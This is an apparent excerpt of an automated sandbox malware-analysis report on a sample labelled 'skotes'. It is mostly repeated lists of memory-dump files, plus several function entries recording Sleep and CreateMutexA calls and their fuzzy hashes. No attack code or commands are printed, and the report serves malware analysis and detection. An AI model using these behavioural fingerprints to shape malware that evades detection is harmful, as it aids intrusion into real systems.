Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2f16c307ab9306cdaf85e05327655fff54db69725b224ceac0c231ea0193b0c0
Instruction ID: 0068fd69a82252e735884b27cfd326d7aa710fb536cee829e260f3de3efa4047
Opcode Fuzzy Hash: 2f16c307ab9306cdaf85e05327655fff54db69725b224ceac0c231ea0193b0c0
Instruction Fuzzy Hash: 21313B316001109BEB189B78ED957ADB7E2EFC5710F244699E01CE72D5D735A9808752

Function 00B2A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: affaf482c23bd62e9fd28a88621da2370aff02b8594fde284eb529c29448bee7
Instruction ID: 9b97e9273b08c500a06cb27e6f3af059e163d39adc6202fbc87a857a69b5b8a3
Opcode Fuzzy Hash: affaf482c23bd62e9fd28a88621da2370aff02b8594fde284eb529c29448bee7
Instruction Fuzzy Hash: 28314831A102109BEB089B78EDC976DB7F2DFC6324F248698E018A73D5C7369980C712

Function 00B2A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7526fe8854d88185026bfa3b5524c3c6fe0c5cbaf8833729a8b10a116857373d
Instruction ID: f55f0f9781eac20690bff1f37ce8c4bae296ee262d6afdc2a4531fc96f29e269
Opcode Fuzzy Hash: 7526fe8854d88185026bfa3b5524c3c6fe0c5cbaf8833729a8b10a116857373d
Instruction Fuzzy Hash: 8B312831A00210DBEB089B78EDC976DB7F2EFC6320F244698E018A72D5D77699C08712

Function 00B2A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 81859e2535231a67bead6be0945acf4e1c459101104beda89e64524032ee49d3
Instruction ID: 6405671dbe8f25591f06900b14b34ecb17394bf686c7427bd1c9d9fa35ef9f12
Opcode Fuzzy Hash: 81859e2535231a67bead6be0945acf4e1c459101104beda89e64524032ee49d3
Instruction Fuzzy Hash: 6D312A31A002109BEB08AB78EC8976DB7E2EFC5314F344298E4289B3D5DB7599C58752

Function 00B2A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 667204c2fadc523613abe038a62340b28a9bd151edb1f1a3b4b180621bdc5e4d
Instruction ID: b89aa076328a6349755a82cb83ed1dd3ae451ed583e540d5c8214bfcbf05e62b
Opcode Fuzzy Hash: 667204c2fadc523613abe038a62340b28a9bd151edb1f1a3b4b180621bdc5e4d
Instruction Fuzzy Hash: BE312A31A001109BEB08DB78ECC976DB7E2EFC6724F348698E4189B3D5CB3599858712

Function 00B2A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
